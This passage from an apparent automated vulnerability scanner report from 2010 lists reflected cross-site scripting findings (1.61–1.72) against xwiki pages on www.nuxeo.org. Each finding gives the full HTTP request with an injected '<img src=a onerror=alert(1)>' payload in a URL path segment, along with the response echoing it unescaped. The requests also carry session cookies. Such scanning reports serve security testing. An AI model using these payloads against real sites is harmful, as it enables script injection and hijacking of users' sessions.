The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8b6e"><img%20src%3da%20onerror%3dalert(1)>7640e37c755 was submitted in the REST URL parameter 4. This input was echoed as e8b6e"><img src=a onerror=alert(1)>7640e37c755 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maine8b6e"><img%20src%3da%20onerror%3dalert(1)>7640e37c755/BookEPMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:28 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12989
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maine8b6e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7640e37c755/BookEPMoved?format=xar&amp;name=Maine8b6e"><img src=a onerror=alert(1)>7640e37c755.BookEPMoved&amp;pages=Maine8b6e">
...[SNIP]...

1.61. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94b55<img%20src%3da%20onerror%3dalert(1)>bdb277e3df2 was submitted in the REST URL parameter 4. This input was echoed as 94b55<img src=a onerror=alert(1)>bdb277e3df2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main94b55<img%20src%3da%20onerror%3dalert(1)>bdb277e3df2/BookEPMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12923
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main94b55%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ebdb277e3df2/">Main94b55<img src=a onerror=alert(1)>bdb277e3df2</a>
...[SNIP]...

1.62. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a5c7c<img%20src%3da%20onerror%3dalert(1)>66b831a0a72 was submitted in the REST URL parameter 5. This input was echoed as a5c7c<img src=a onerror=alert(1)>66b831a0a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookEPMoveda5c7c<img%20src%3da%20onerror%3dalert(1)>66b831a0a72 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12911
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoveda5c7c%3Cimg+src%3Da+onerror%3Dalert%281%29%3E66b831a0a72'>BookEPMoveda5c7c<img src=a onerror=alert(1)>66b831a0a72</a>
...[SNIP]...

1.63. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53fbe"><img%20src%3da%20onerror%3dalert(1)>e2db809e87b was submitted in the REST URL parameter 5. This input was echoed as 53fbe"><img src=a onerror=alert(1)>e2db809e87b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookEPMoved53fbe"><img%20src%3da%20onerror%3dalert(1)>e2db809e87b HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12973
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/BookEPMoved53fbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee2db809e87b?format=xar&amp;name=Main.BookEPMoved53fbe"><img src=a onerror=alert(1)>e2db809e87b&amp;pages=Main.BookEPMoved53fbe">
...[SNIP]...

1.64. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9ac20<img%20src%3da%20onerror%3dalert(1)>34b3d0cb59f was submitted in the REST URL parameter 4. This input was echoed as 9ac20<img src=a onerror=alert(1)>34b3d0cb59f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main9ac20<img%20src%3da%20onerror%3dalert(1)>34b3d0cb59f/CMIS HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:51 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12832
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main9ac20%3Cimg+src%3Da+onerror%3Dalert%281%29%3E34b3d0cb59f/">Main9ac20<img src=a onerror=alert(1)>34b3d0cb59f</a>
...[SNIP]...

1.65. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d639"><img%20src%3da%20onerror%3dalert(1)>4b8cf8e51bb was submitted in the REST URL parameter 4. This input was echoed as 6d639"><img src=a onerror=alert(1)>4b8cf8e51bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6d639"><img%20src%3da%20onerror%3dalert(1)>4b8cf8e51bb/CMIS HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main6d639%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4b8cf8e51bb/CMIS?format=xar&amp;name=Main6d639"><img src=a onerror=alert(1)>4b8cf8e51bb.CMIS&amp;pages=Main6d639">
...[SNIP]...

1.66. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ef7"><img%20src%3da%20onerror%3dalert(1)>13a548dc1df was submitted in the REST URL parameter 5. This input was echoed as 38ef7"><img src=a onerror=alert(1)>13a548dc1df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/CMIS38ef7"><img%20src%3da%20onerror%3dalert(1)>13a548dc1df HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:29 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12882
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/CMIS38ef7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E13a548dc1df?format=xar&amp;name=Main.CMIS38ef7"><img src=a onerror=alert(1)>13a548dc1df&amp;pages=Main.CMIS38ef7">
...[SNIP]...

1.67. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 95275<img%20src%3da%20onerror%3dalert(1)>692dc4b9251 was submitted in the REST URL parameter 5. This input was echoed as 95275<img src=a onerror=alert(1)>692dc4b9251 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/CMIS95275<img%20src%3da%20onerror%3dalert(1)>692dc4b9251 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12820
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/CMIS95275%3Cimg+src%3Da+onerror%3Dalert%281%29%3E692dc4b9251'>CMIS95275<img src=a onerror=alert(1)>692dc4b9251</a>
...[SNIP]...

1.68. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ae2d<img%20src%3da%20onerror%3dalert(1)>460174238d1 was submitted in the REST URL parameter 4. This input was echoed as 2ae2d<img src=a onerror=alert(1)>460174238d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main2ae2d<img%20src%3da%20onerror%3dalert(1)>460174238d1/ContributionSpace HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13001
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main2ae2d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E460174238d1/">Main2ae2d<img src=a onerror=alert(1)>460174238d1</a>
...[SNIP]...

1.69. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434b1"><img%20src%3da%20onerror%3dalert(1)>a501731b55d was submitted in the REST URL parameter 4. This input was echoed as 434b1"><img src=a onerror=alert(1)>a501731b55d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main434b1"><img%20src%3da%20onerror%3dalert(1)>a501731b55d/ContributionSpace HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13067
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main434b1%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea501731b55d/ContributionSpace?format=xar&amp;name=Main434b1"><img src=a onerror=alert(1)>a501731b55d.ContributionSpace&amp;pages=Main434b1">
...[SNIP]...

1.70. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6af3"><img%20src%3da%20onerror%3dalert(1)>761b200ad62 was submitted in the REST URL parameter 5. This input was echoed as f6af3"><img src=a onerror=alert(1)>761b200ad62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/ContributionSpacef6af3"><img%20src%3da%20onerror%3dalert(1)>761b200ad62 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13051
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/ContributionSpacef6af3%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E761b200ad62?format=xar&amp;name=Main.ContributionSpacef6af3"><img src=a onerror=alert(1)>761b200ad62&amp;pages=Main.ContributionSpacef6af3">
...[SNIP]...

1.71. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 61c31<img%20src%3da%20onerror%3dalert(1)>d24e0bc59b3 was submitted in the REST URL parameter 5. This input was echoed as 61c31<img src=a onerror=alert(1)>d24e0bc59b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/ContributionSpace61c31<img%20src%3da%20onerror%3dalert(1)>d24e0bc59b3 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:31 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12989
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace61c31%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed24e0bc59b3'>ContributionSpace61c31<img src=a onerror=alert(1)>d24e0bc59b3</a>
...[SNIP]...

1.72. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f93c1<img%20src%3da%20onerror%3dalert(1)>4d9be4736ed was submitted in the REST URL parameter 4. This input was echoed as f93c1<img src=a onerror=alert(1)>4d9be4736ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainf93c1<img%20src%3da%20onerror%3dalert(1)>4d9be4736ed/Dashboard HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12897
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
